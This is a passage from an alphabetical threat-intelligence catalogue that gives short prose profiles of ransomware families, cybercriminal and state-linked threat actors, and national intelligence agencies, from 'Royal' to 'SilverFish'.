Royal is a ransomware group believed to be responsible for hundreds of attacks on victims worldwide, including those in critical infrastructure sectors including manufacturing, communications, healthcare, and education. The actors that comprise the Royal ransomware operation are believed to be former members of other cybercriminal groups linked to Roy/Zeon ransomware, Conti ransomware, and TrickBot. Unlike many of the other most prominent ransomware groups in recent years, the developers of Royal ransomware are not known to lease the malware to affiliates as a service.[[Kroll Royal Deep Dive February 2023](/references/dcdcc965-56d0-58e6-996b-d8bd40916745)] The Royal group often pressures victims into paying ransom demands by threatening to leak data exfiltrated during intrusions. While public data from the [ransomwatch project](https://github.com/joshhighet/ransomwatch) suggest the group has claimed roughly 200 victims since Q4 2022, a November 2023 U.S. government advisory indicated that Royal “has targeted over 350 known victims worldwide” since September 2022, with extortion demands at times exceeding $250 million.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)][[CISA Royal AA23-061A March 2023](/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)]

Royal

Royal is an active extortion or ransomware group tracked by RansomLook.

RozaLocker Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Rozlok

ransomware

Rransom

Rransom is an active extortion or ransomware group tracked by RansomLook.

RSA-NI

ransomware

RSA2048Pro

ransomware

RSAUtil

RSAUtil is distributed by the developer hacking into remote desktop services and uploading a package of files. This package contains a variety of tools, a config file that determines how the ransomware executes, and the ransomware itself.

Rtm Locker

Rtm Locker is an active extortion or ransomware group tracked by RansomLook.

Ruby Sleet

Ruby Sleet is a threat actor linked to North Korea's Ministry of State Security. Cerium has been involved in spear-phishing campaigns, compromising devices, and conducting cyberattacks alongside other North Korean threat actors. They have also targeted companies involved in COVID-19 research and vaccine development.

Ruby

ransomware

RUBYCARP

RUBYCARP is a financially-motivated threat actor group likely based in Romania, with a history of at least 10 years of activity. They operate a botnet using public exploits and brute force attacks, communicating via public and private IRC networks. RUBYCARP targets vulnerabilities in frameworks like Laravel and WordPress, as well as conducting phishing operations to steal financial assets. They use a variety of tools, including the Perl Shellbot, for post-exploitation activities and have a diverse set of illicit income streams.

Run Some Wares

Run Some Wares is an active extortion or ransomware group tracked by RansomLook.

RunExeMemory

ransomware

Runsomewere

Ransomware. Based on HT/EDA2; utilizes the Jigsaw ransomware background.

Rush

ransomware

RuskiNet

RuskiNet is a pro-Russian hacktivist collective associated with disruptive operations including DDoS attacks, website defacements, phishing, and data leaks against government, infrastructure, financial, and civil targets.

Russenger

ransomware

Russian EDA2

ransomware

Russian Globe Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

RussianRoulette

Ransomware. Variant of the Philadelphia ransomware.

Rustylocker

Rustylocker is an active ransomware-as-a-service operation tracked by RansomLook.

Ruthless Rabbit

Ruthless Rabbit has been running investment scam campaigns since November 2022, primarily targeting users in Russia, Poland, Romania, and Kazakhstan. The actor utilizes RDGA patterns to create over 2,600 domains, hosted on multiple dedicated IPs, and employs a cloaking service for validation checks on user leads. Their campaigns have included themes such as Baltic Pipe financial scams and spoofing well-known platforms like WhatsApp and Google Finance. The most prevalent campaign theme involves a spoofed news article from "Channel One" promoting the "GazInvest" platform with promises of high returns.

Ruza Flood

Microsoft threat actor profile. Origin/Threat: Russia, Influence operations.

Ryuk ransomware

Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD.

Ryuk

Ryuk is a ransomware operation known for targeting large organizations and demanding high ransom payments.

Służba Kontrwywiadu Wojskowego

Military Counter-intelligence Service - Służba Kontrwywiadu Wojskowego (SKW)

Służba Wywiadu Wojskowego

Military Intelligence Service - Służba Wywiadu Wojskowego (SWW)

Saad Tycoon

Saad Tycoon is the operator and alleged developer of the Tycoon 2FA PhaaS, a phishing service that targets users for financial gain. The actor utilizes Bitcoin transactions to generate significant profits from the fraudulent service. The phishing infrastructure includes domain registration, server hosting, and possibly Cloudflare protection.

Sabbath

Sabbath is an active extortion or ransomware group tracked by RansomLook.

SABRE PANDA

SABRE PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

SAD

ransomware

SadComputer

ransomware

Sadogo

ransomware

SADStory

Ransomware. Variant of CryPy.

SafePay Ransomware Actors

The SafePay ransomware group is a cybercrime gang known for deploying ransomware to encrypt files and demand ransoms. They are relatively obscure and not widely discussed on illicit forums. Their activities include data exfiltration and file encryption, often using tools like WinRAR and FileZilla for archiving and potential exfiltration.[[huntress.com November 14 2024](/references/0418012c-af7e-47b0-b690-85fd634532e4)]

SafePay

SafePay is a ransomware group particularly active in Germany, responsible for 24% of the 74 ransomware victims reported in the country during Q1 2025.

Sage 2.0 Ransomware

It’s directed at English-speaking users, therefore it is able to infect worldwide. This ransomware attacks your MS Office by offering a macro to help with your program, but instead encrypts all your files if the user is not protected. Predecessor: CryLocker.

Sage 2.2

Ransomware Sage 2.2 deletes volume snapshots through vssadmin.exe, disables startup repair, uses process wscript.exe to execute a VBScript, and coordinates the execution of scheduled tasks via schtasks.exe.

Sage Ransomware

It’s directed at English-speaking users, therefore it is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Salsa

ransomware

Salt Typhoon (Deprecated)

*We are no longer maintaining this object in favor of a similar object subsequently published by MITRE: "Salt Typhoon" (Group). All relevant Tidal content extensions (e.g. additional Technique and Object relationships and metadata) have been added to the MITRE-authored object.* Salt Typhoon is likely a cyberespionage group linked to the Chinese government. September 2024 reports indicated the group is believed to have compromised U.S. internet service providers with the intent of collecting sensitive information.[[WSJ Salt Typhoon September 26 2024](/references/15b4c5c3-edf2-4f6b-b398-62767cfabf5a)] Microsoft researchers indicate that "other names" for Salt Typhoon actors include FamousSparrow and GhostEmperor, a group that was previously tied to supply chain attacks on telecommunications and government entities in Southeast Asia.[[Microsoft Threat Actor Naming July 2023](/references/78a8137d-694e-533d-aed3-6bd48fc0cd4a)][[Sygnia July 17 2024](/references/7d30acb4-9600-46bd-a800-1c7e1149e9b4)] Mandiant researchers identified activity overlaps between GhostEmperor, FamousSparrow, and actors they track as UNC2286.[[Mandiant UNC4841 August 29 2023](/references/f990745d-06c1-4b0a-8394-66c7a3cf0818)]

SALTY SPIDER

Beginning in January 2018 and persisting through the first half of the year, CrowdStrike Intelligence observed SALTY SPIDER, developer and operator of the long-running Sality botnet, distribute malware designed to target cryptocurrency users.

Samas-Samsam

Ransomware. Targeted attacks; tools used include Jexboss, PSExec, and Hyena.

SAMBASPIDER

SAMBASPIDER is a threat actor associated with the Mispadu malware. On July 24, USDoD allegedly scraped and leaked a 100,000-line Indicator of Compromise list from CrowdStrike, revealing detailed threat intelligence data. The leak, posted on Breach Forums, includes critical insights into the Mispadu malware and the SAMBASPIDER threat actor.

SAMURAI PANDA

SAMURAI PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Sanction

Ransomware. Based on HiddenTear, but with a heavily modified keygen.

Sanctions

Ransomware

SandCat

SandCat is a group that was discovered more recently by Kaspersky. One of the Windows vulnerabilities patched by Microsoft in December had been exploited by both FruityArmor and SandCat in attacks targeting the Middle East and Africa. SandCat has been using FinFisher/FinSpy spyware and CHAINSHOT, a piece of malware analyzed earlier that year by Palo Alto Networks. The group has also used the CVE-2018-8589 and CVE-2018-8611 Windows vulnerabilities in its attacks, both of which had zero-day status when Microsoft released fixes.

Sandman APT

First disclosed in 2023, the Sandman APT is likely associated with suspected China-based threat clusters known for using the KEYPLUG backdoor, specifically STORM-0866/Red Dev 40. Sandman is tracked as a distinct cluster, pending additional conclusive information. A notable characteristic is its use of the LuaDream backdoor. LuaDream is based on the Lua platform, a relatively rare occurrence in the cyberespionage domain, historically associated with APTs considered Western or Western-aligned.

Sands Casino

Sands Casino is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Sandworm

This threat actor targets industrial control systems associated with electricity and power generation, using a tool called Black Energy, for espionage, denial of service, and data destruction purposes. Some believe that the threat actor is linked to the 2015 compromise of the Ukrainian electrical grid and a distributed denial of service prior to the Russian invasion of Georgia. It is believed to be responsible for the 2008 DDoS attacks in Georgia and the 2015 Ukraine power grid outage.

Santa Encryptor

ransomware

Saramat

ransomware

SARansom

ransomware

sarcoma

Sarcoma is a ransomware group that emerged in October 2024 and has been actively targeting various organizations. Sarcoma's attack methods include phishing campaigns, exploiting n-day vulnerabilities, and supply chain attacks. Once inside a network, they use RDP exploitation, lateral movement, and data exfiltration tactics. Sarcoma has claimed responsibility for attacks against Unimicron, a PCB manufacturer, Kelowna Springs Golf Club, Popular Life Insurance, CP Construplan, ADT Freight Services Australia, and Micon National. These attacks have resulted in data exfiltration, with Sarcoma threatening to leak or having already leaked stolen data. Specifically, Sarcoma has exfiltrated 377 GB of SQL files and sensitive documents from Unimicron, 3.8 GB of data from Kelowna Springs, 36 GB of data from Popular Life Insurance, 2 GB of data from ADT Freight Services Australia, and 34 GB of data from Micon National. The group is known for its aggressive tactics against industrial organizations.

Sardoninir

Ransomware

Satan Cryptor 2.0

ransomware

Satan Ransomware

It’s directed at English-speaking users, therefore it is able to infect worldwide. Its original name is RAAS RANSOMWARE. It is spread using email spam, fake updates, infected attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, etc. This ransomware encourages others to download the virus and spread it as ransomware to infect other users, keeping 70% of the ransom (and leaving the other 30% to Satan). https://3.bp.blogspot.com/-7fwX40eYL18/WH-tfpNjDgI/AAAAAAAADPk/KVP_ji8lR0gENCMYhb324mfzIFFpiaOwACLcB/s1600/site-raas.gif RaaS

Satan's Doom Crypter

ransomware

Satan666 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

Satana

Ransomware

Satancd

Satancd is an active extortion or ransomware group tracked by RansomLook.

SatanCryptor Go

ransomware

satanlock

Connected to GD Lockersec and Babuk-Bjorka.

The group is also known as SalanLock (from a typo on its victim pages).

Sath-ı Müdafaa

A Turkish hacking group, Sath-ı Müdafaa, is encouraging individuals to join its DDoS-for-Points platform that features points and prizes for carrying out distributed denial-of-service (DDoS) attacks against a list of predetermined targets. Their DDoS tool also contains a backdoor to hack the hackers. So the overarching motivation and allegiance of the group is not entirely clear.

Saturn

ransomware

Satyr

ransomware

Saudi Arabian Border Guards

Saudi Arabia Border Guards Intelligence Directorate – استخبارات حرس الحدود

SaveTheQueen

ransomware

ScamClub

ScamClub is a threat actor involved in malvertising activities since 2018. They target the Mobile Web market segment, particularly on iOS devices, where security software is often lacking. ScamClub utilizes obfuscation techniques and real-time bidding integration with ad exchanges to push malicious JavaScript payloads, leading to forced redirects and various scams such as phishing and gift card scams.

ScammerLocker HT

ransomware

ScammerLocker Ph

ransomware

Scarab

Scarab APT was first spotted in 2015, but is believed to have been active since at least 2012, conducting surgical attacks against a small number of individuals across the world, including Russia and the United States. The backdoor deployed by Scarab in their campaigns is most commonly known as Scieron.

Scarlet Goldfinch

Scarlet Goldfinch is a threat activity cluster that typically tricks victims into downloading files that appear to be web browser updates, with the file ultimately leading to the deployment of NetSupport Manager, a remote monitoring and management (RMM) utility that has been heavily abused by adversaries.[[Red Canary June 26 2024](/references/e0d62504-6fec-4d95-9f4a-e0dda7e7b6d9)]

SCARLETEEL

SCARLETEEL is a threat actor that primarily targets cloud environments, specifically AWS and Kubernetes. They have been observed stealing proprietary data and intellectual property, as well as conducting cryptomining operations. SCARLETEEL employs sophisticated tactics and tools to bypass security measures and gain unauthorized access to accounts, often exploiting vulnerabilities in containerized workloads and misconfigurations in AWS policies.

Scarred Manticore

Scarred Manticore has been pursuing high-value targets for years, utilizing a variety of IIS-based backdoors to attack Windows servers. These include a variety of custom web shells, custom DLL backdoors, and driver-based implants.

Scatterbrain

ransomware

Scattered Canary

When the first member of Scattered Canary, who, for the purposes of this report, we call Alpha, began his operations, he was a lone wolf—working mostly Craigslist scams as he learned the tricks of the trade from a mentor. However, within a few years, he had honed his craft enough to expand into romance scams, where he met his first “employee,” Beta. Once they had secured enough mules via their romance scams to launder their stolen money, they shifted from targeting individuals to targeting enterprises, and the group’s BEC operation was born.

Scattered Lapsus Hunters

Scattered Lapsus Hunters is an active extortion or ransomware group tracked by RansomLook.

Schoolboys

Schoolboys is an active extortion or ransomware group tracked by RansomLook.

Schwerer

ransomware

ScorpionLocker

ransomware

Scrabber

ransomware

Scraper

Ransomware

ScreamedJungle

ScreamedJungle is a threat actor that exploits vulnerabilities in outdated Magento e-commerce platforms to inject malicious JavaScript code, specifically Bablosoft JS, into compromised websites. This actor has harvested millions of browser fingerprints by leveraging vulnerabilities such as CVE-2024-34102 and CVE-2024-20720. ScreamedJungle utilizes PerfectCanvas technology to ensure pixel-perfect replication of legitimate user fingerprints. Group-IB analysts estimate that over 115 e-commerce sites have been impacted by this fingerprint theft campaign.

Scripted Sparrow

Scripted Sparrow is a prolific Business Email Compromise (BEC) collective that conducts highly targeted phishing campaigns, impersonating professional services firms to deceive finance teams into transferring funds. The group employs a disciplined approach, utilizing consistent language and familiar tones in their communications, while sending between 10,000 and 50,000 emails daily in small batches. They have developed a sophisticated understanding of corporate communication, crafting messages that mimic internal formats and urgency without raising suspicion. Scripted Sparrow relies on a network of US-based mule accounts, with 249 unique bank accounts identified across 42 financial institutions for cash-out operations.

Scroboscope

ransomware

SCULLY SPIDER

Mentioned as operator of DanaBot in CrowdStrike's 2020 Report.

Seashell Blizzard Subgroup

This object reflects ATT&CK Technique and other relationships associated with an unnamed "subgroup" of the Russia-linked Seashell Blizzard group, known for a multiyear initial access operation dubbed the "BadPilot" campaign.[[Microsoft Security Blog February 12 2025](/references/300bf6cb-582b-4e15-8cca-cb68c8856e6f)] Seashell Blizzard is a high-impact threat actor linked to the Russian Federation, conducting global activities on behalf of Russian Military Intelligence Unit 74455 (GRU). Its operations range from espionage to information operations and cyber-enabled disruptions, including destructive attacks and manipulation of industrial control systems (ICS). According to Microsoft researchers, Seashell Blizzard "overlaps with" groups tracked as Sandworm Team, APT44, and other names.[[Microsoft Security Blog February 12 2025](/references/300bf6cb-582b-4e15-8cca-cb68c8856e6f)]

Second Investigation Department

Second Investigation Department - (Antrasis operatyvinių tarnybų departamentas (AOTD))

secp0

secp0 is an active extortion or ransomware group tracked by RansomLook.

Secret Intelligence Service

Secret Intelligence Service (SIS)/MI6 – Foreign intelligence gathering and analysis.

Secretaria da Receita Federal do Brasil

Secretaria da Receita Federal do Brasil (Federal Revenue Secretariat) (RFB) (General Coordination for Research and Investigations - Coordenação-Geral de Pesquisa e Investigação - Copei)

Secretariat of the Navy

Naval Intelligence - (Inteligencia Naval / SEMAR / Marina Armada)

SecretSystem

ransomware

SecureCryptor

ransomware

Security and Exchange Commission of Pakistan

Security and Exchange Commission Pakistan (SECP)

Security and Intelligence Agency

Sigurnosno-obavještajna agencija (SOA) (Security and Intelligence Agency)

Security and Intelligence Division

Security and Intelligence Division (SID)

Security Information Service

Security Information Service (Bezpečnostní informační služba, BIS)

Security Intelligence Agency

Security Intelligence Agency – Безбедносно-информативна агенција (BIA)

Security Service of Ukraine

Security Service of Ukraine – Sluzhba Bezpeky Ukrayiny (SBU)

Securotrop

Securotrop is an active extortion or ransomware group tracked by RansomLook.

SEDENA

Military Intelligence – National Defense Ministry (Inteligencia Militar – SEDENA / Ejercito y Fuerza Aerea)

Sefid Flood

Microsoft threat actor profile. Origin/Threat: Iran, Influence operations.

SeginChile

ransomware

Sekhmet

Ransom.Sekhmet not only encrypts a victim's files, but also threatens to publish them.

SEND.ID.TO

ransomware

Sensayq

Sensayq is an active extortion or ransomware group tracked by RansomLook.

Seoirse Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Seoirse is the Irish form of the name George. Ransom is 0.5 Bitcoins.

Seon

ransomware

Sepsis

ransomware

SepSys

ransomware

SerbRansom 2017 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom is $500 in bitcoins. The name of the hacker is R4z0rx0r Serbian Hacker.

Serpent 2017 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

Serpico

Ransomware DetoxCrypto Variant

Serviço de Informações de Segurança

Security Intelligence Service - Serviço de Informações de Segurança (SIS)

Serviço de Informações Estratégicas de Defesa

Defense Strategic Intelligence Service - Serviço de Informações Estratégicas de Defesa (SIED)

Service d'Intelligence National

Service d'Intelligence National (SIN) (National Intelligence Service)

Service de Renseignement de l’État

Luxembourg State Intelligence Service - (Service de Renseignement de l'État Luxembourgeois)

Servicio de Inteligencia de la Fuerza Aérea (Argentina)

Air Force Intelligence Service (SIFA) – Servicio de Inteligencia de la Fuerza Aérea

Servicio de Inteligencia del Ejército (Argentina)

Army Intelligence Service (SIE) – Servicio de Inteligencia del Ejército

Servicio de Inteligencia Naval (Argentina)

Naval Intelligence Service (SIN) – Servicio de Inteligencia Naval

Servicio Federal de Lucha contra el Narcotráfico

Federal Counternarcotics Service (SEFECONAR) – Servicio Federal de Lucha contra el Narcotráfico

Serviciul de Telecomunicații Speciale

Special Telecommunication Service (STS) – Serviciul de Telecomunicații Speciale

SEXi

SEXi is a ransomware group that targets VMware ESXi servers, encrypting data and demanding ransom payments. They have been observed encrypting virtual machines and backups, causing significant disruptions to services. The group's name is a play on the word "ESXi," indicating a deliberate focus on these systems. SEXi has been linked to other ransomware variants based on the Babuk source code.

SGL Actor

SGL is a username used by a threat actor on the XSS cybercriminal forum. The actor was observed attempting to sell access to allegedly compromised corporate network VPN gateways and RDP software.[[Resecurity Remote Access Compromise March 13 2024](/references/eb3fc217-44b7-496f-b5d1-68b40f476ce3)][[CYJAX 2024 Year in Review January 29 2025](/references/f22b8c2c-6307-420d-9aac-7da4f054bd1f)]

Shadi

ransomware

SHADOW-AETHER-015

SHADOW-AETHER-015 is a highly adaptable cybercriminal group known for identity abuse and cloud compromise, primarily targeting identity and access management systems like Okta and Azure AD/Entra ID. They employ sophisticated social engineering techniques, including vishing and help-desk impersonation, to gain access to legitimate credentials. Their operations involve multi-pressure extortion tactics, such as data theft, ransomware, and employee intimidation, while leveraging MFA fatigue and token theft to bypass authentication controls. The group has been linked to the "0ktapus" phishing campaign and is most active in English-speaking countries, with a focus on sectors rich in sensitive data.

Shadow-Earth-053

SHADOW-EARTH-053 is a China-aligned threat group exploiting unpatched Microsoft Exchange Server vulnerabilities, specifically CVE-2021-26855, to conduct cyberespionage against government and defense-linked targets across Asia and Europe. The group primarily deploys ShadowPad malware, utilizing techniques such as credential dumping, tunneling tools, and lateral movement via WMIC. They have also been observed installing web shells for persistence and leveraging a custom ExchangeExport tool to extract high-value mailbox contents. Additionally, low-confidence associations with Noodle RAT and CVE-2025-55182 have been noted in their operations.

Shadow Network

Shadows in the Cloud documents a complex ecosystem of cyber espionage that systematically compromised government, business, academic, and other computer network systems in India, the Offices of the Dalai Lama, the United Nations, and several other countries. The report also contains an analysis of data which were stolen from politically sensitive targets and recovered during the course of the investigation. These include documents from the Offices of the Dalai Lama and agencies of the Indian national security establishment. Data containing sensitive information on citizens of numerous third-party countries, as well as personal, financial, and business information, were also exfiltrated and recovered during the course of the investigation. The report analyzes the malware ecosystem employed by the Shadows’ attackers, which leveraged multiple redundant cloud computing systems, social networking platforms, and free web hosting services in order to maintain persistent control while operating core servers located in the People’s Republic of China (PRC). Although the identity and motivation of the attackers remain unknown, the report is able to determine the location (Chengdu, PRC) as well as some of the associations of the attackers through circumstantial evidence. The investigation is the product of an eight month, collaborative activity between the Information Warfare Monitor (Citizen Lab and SecDev) and the Shadowserver Foundation. The investigation employed a fusion methodology, combining technical interrogation techniques, data analysis, and field research, to track and uncover the Shadow cyber espionage network.

SHADOW-VOID-042

SHADOW-VOID-042 is a provisional intrusion set tracked by Trend Micro, active in October-November 2025, conducting spear-phishing campaigns against energy, defense, pharmaceutical, cybersecurity, and other sectors using lures like HR complaints, research surveys, and fake Trend Micro security updates urging browser fixes. Attacks employ multi-stage loaders: shellcode generates machine-specific IDs for C2 "get_module_hello" requests fetching encrypted Stage 2 (SystemProcessHost.exe) with scheduled tasks for persistence, followed by Stage 3 fetching additional payloads via API hashing and retries on hardcoded C2s. Infrastructure overlaps with Void Rabisu (ROMCOM/Storm-0978), but lacks confirmed ROMCOM deployment or Ukraine focus, warranting separate tracking.

Shadow

Shadow is an active extortion or ransomware group tracked by RansomLook.

shadowbyt3

shadowbyt3 is an active extortion or ransomware group tracked by RansomLook.

ShadowCryptor

ransomware

ShadowSyndicate

ShadowSyndicate is a threat actor associated with various ransomware groups, using a consistent Secure Shell fingerprint across multiple servers. They have been linked to ransomware families such as Quantum, Nokoyawa, and ALPHV. ShadowSyndicate's infrastructure overlaps with that of Cl0p, suggesting potential connections between the two groups. Their activities indicate they may be a Ransomware-as-a-Service affiliate.

ShadyPanda

ShadyPanda is a threat actor behind a 7-year campaign that has infected 4.3 million users through extensions masquerading as productivity tools while functioning as comprehensive spyware. Their tactics include data exfiltration, user surveillance, and systematic collection of corporate meeting intelligence from over 28 video conferencing platforms. Notably, the WeTab extension exemplifies their capabilities, collecting full browsing history and personal data, exfiltrating to 17 different domains. The actor employs steganography to hide malicious code within PNG files and maintains persistent access through shared infrastructure across their extensions.

ShaggyPanther

ShaggyPanther is a threat actor that primarily targets government entities in Taiwan and Malaysia. They have been active since 2008 and utilize hidden encrypted payloads in registry keys. Their activities have been detected in various locations, including Indonesia and Syria.

Shahid Hemmat

Shahid Hemmat is an IRGC-CEC affiliated hacking group linked to cyberattacks targeting U.S. critical infrastructure, including the defense industry and international transportation sectors. The group has been implicated in the hack of a booster station at the Municipal Water Authority in Aliquippa, Pennsylvania, which disrupted drinking water supply. Key figures within Shahid Hemmat include Manouchehr Akbari, Amir Hossein Hoseini, Mohammad Hossein Moradi, and Mohammad Reza Rafatnejad. The U.S. government is offering a $10 million reward for information on these individuals.

Shamoon Group

Shamoon Group is an Iran-linked threat actor associated with destructive Shamoon wiper operations targeting organizations in the Middle East, especially in the energy sector.

SHARK SPIDER

This group's activity was first observed in November 2013. It leverages a banking Trojan more commonly known as Shylock which aims to compromise online banking credentials and credentials related to Bitcoin wallets.

Shark

Ransomware

SharpPanda

SharpPanda, an APT group originating from China, has seen a rise in its cyber-attack operations starting from at least 2018. The APT group utilizes spear-phishing techniques to obtain initial access, employing a combination of outdated Microsoft Office document vulnerabilities, novel evasion techniques, and highly potent backdoor malware.

ShellLocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

Shin Bet

Shin Bet (Internal Security Service)

ShinigamiLocker

ransomware

ShinoLocker

Ransomware

Shinra

SHINRA ransomware is a variant of the Proton ransomware family, known for its malicious activities involving data encryption and demanding a ransom for data decryption. After encrypting files, the ransomware renames them with a sequence of random characters and appends the ".SHINRA3" extension to the filenames. It is worth noting that this ransomware uses AES and ECC encryption algorithms to lock files on the victim's computer. Following the encryption, it creates a ransom note named "SHINRA-Recovery.txt." There are not many details about its operation or methods of infecting its victims, but after encryption, the victim needs to send an email regarding recovery to the addresses provided, including their ID as generated by the ransomware: Qq.decrypt@gmail.com, Qq.encrypt@gmail.com, ethan@fastmsg.info. The ransomware also changes the victim's wallpaper, displaying the need to send the data and contact the threat actor.

ShinyHunters

ShinyHunters is a cybercriminal group of unknown origin that is motivated by financial gain. The group is known for its sophisticated attacks against a wide range of targets, including businesses, organizations, and government agencies. ShinyHunters typically uses phishing attacks and exploit kits to gain access to victim networks, where they deploy malware to steal sensitive data, such as names, addresses, phone numbers, Social Security numbers, and credit card information.

ShkolotaCrypt

ransomware

ShroudedSnooper

In September 2023, Cisco Talos identified a new malware family that it calls ‘HTTPSnoop’ being deployed against telecommunications providers in the Middle East. They also discovered a sister implant to ‘HTTPSnoop’ that they are naming ‘PipeSnoop’, which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. Based on these findings, the researchers assess with high confidence that both implants belong to a new intrusion set that they named ‘ShroudedSnooper’.

Shrug

ransomware

Shujin

Ransomware

ShurL0ckr

Security researchers uncovered a new ransomware named ShurL0ckr (detected by Trend Micro as RANSOM_GOSHIFR.B) that reportedly bypasses detection mechanisms of cloud platforms. Like Cerber and Satan, ShurL0ckr’s operators further monetize the ransomware by peddling it as a turnkey service to fellow cybercriminals, allowing them to earn additional income through a commission from each victim who pays the ransom.

Shutdown57

ransomware

ShutUpAndDance

ransomware

Sicari

Sicari is an active extortion or ransomware group tracked by RansomLook.

SiegedSec

SiegedSec, a hacktivist collective, emerged coincidentally just days before Russia’s invasion of Ukraine. Under the leadership of the hacktivist known as “YourAnonWolf,” the group swiftly gained strength, announcing an increasing number of victims after its inception. The group humorously self-identifies as “gay furry hackers” and is renowned for its comical slogans and the use of vulgar language. SiegedSec has affiliations with other hacker groups like GhostSec and typically consists of members aged between 18 and 26.

Siesta

FireEye recently looked deeper into the activity discussed in TrendMicro’s blog and dubbed the “Siesta” campaign. The tools, modus operandi, and infrastructure used in the campaign present two possibilities: either the Chinese cyber-espionage unit APT1 is perpetrating this activity, or another group is using the same tactics and tools as the legacy APT1. The Siesta campaign reinforces the fact that analysts and network defenders should remain on the lookout for known, public indicators and for shared attributes that allow security experts to detect multiple actors with one signature.

SifreCikis

ransomware

SifreCozucu

ransomware

Sifreli 2017

ransomware

Sifreli 2019

ransomware

Sigma Ransomware

Today one of our volunteers, Aura, told me about a new malspam campaign pretending to be from Craigslist that is under way and distributing the Sigma Ransomware. These spam emails contain password protected Word or RTF documents that download the Sigma Ransomware executable from a remote site and install it on a recipient's computer.

Signals Intelligence Agency

Signals Intelligence Agency (SIA)

Sigrun Ransomware

When Sigrun is executed it will first check "HKEY_CURRENT_USER\Keyboard Layout\Preload" to see if it is set to the Russian layout. If the computer is using a Russian layout, it will not encrypt the computer and just delete itself. Otherwise Sigrun will scan a computer for files to encrypt and skip any that match certain extensions, filenames, or are located in particular folders.

Silence group

Silence is a relatively new threat actor that’s been operating since mid-2016. Group-IB has exposed the attacks committed by the Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts also have discovered evidence of the group's activity in more than 25 countries worldwide. Group-IB has published its first detailed report on tactics and tools employed by Silence. Group-IB security analysts' hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD. Silence is a group of Russian-speaking hackers, based on their command language, the location of the infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan), although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia. Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.

Silent Chollima

Andariel is a threat actor that primarily targets South Korean corporations and institutions. They are believed to collaborate with or operate as a subsidiary organization of the Lazarus threat group. The group utilizes spear phishing attacks, watering hole attacks, and supply chain attacks for initial access. They have been known to exploit vulnerabilities and use malware such as Infostealer and TigerRAT.

Silent

Silent is an active ransomware-as-a-service operation tracked by RansomLook.

SilentRansomGroup

SilentRansomGroup is an active extortion or ransomware group tracked by RansomLook.

SilentSpring

ransomware

SilitNetwork

SilitNetwork is a hacking group known for targeting high-profile entities, such as airlines, for various motives. They utilize sophisticated tactics to breach their targets, potentially including social engineering and exploiting software vulnerabilities. The group's attack on RwandAir highlighted the vulnerability of the aviation industry and the need for robust cybersecurity measures.

SILKFIN AGENCY

SILKFIN AGENCY has claimed responsibility for multiple significant data breaches, including the compromise of DimeCuba.com, which exposed over 1 million SMS records and more than 100,000 email records. They also targeted the Sri Lankan Department of Agrarian Development, allegedly compromising the personal and agricultural data of over 1.45 million farmers. Additionally, they claimed a breach of the Siam Cement Group's database. The breaches involved sensitive data such as NIC numbers and transaction details.

SilkSpecter

SilkSpecter is a Chinese financially motivated threat actor that orchestrates phishing campaigns targeting e-commerce shoppers, particularly during peak shopping seasons. They exploit legitimate payment processors like Stripe to exfiltrate Cardholder Data and Personally Identifiable Information through convincing fake e-commerce sites created using the oemapps SaaS platform. Their phishing infrastructure relies on Chinese-hosted CDN servers and utilizes deceptive elements such as the "trusttollsvg" icon and a "/homeapi/collect" endpoint to track victim interactions. Analysts have linked SilkSpecter to over 89 IP addresses and more than 4,000 domain names associated with phishing activities, predominantly using .top, .shop, .store, and .vip TLDs.

SilverFish

SilverFish is believed to be a Russian cyberespionage group that has been involved in various cyberattacks, including the use of the SolarWinds breach as an attack vector. SilverFish has been linked to the Wasted Locker ransomware and has displayed a high level of skill and organization in their cyber operations. There are also connections between SilverFish and the threat actor Evil Corp, suggesting a possible evolution or collaboration between the two groups.

Silvertor

ransomware

Sima

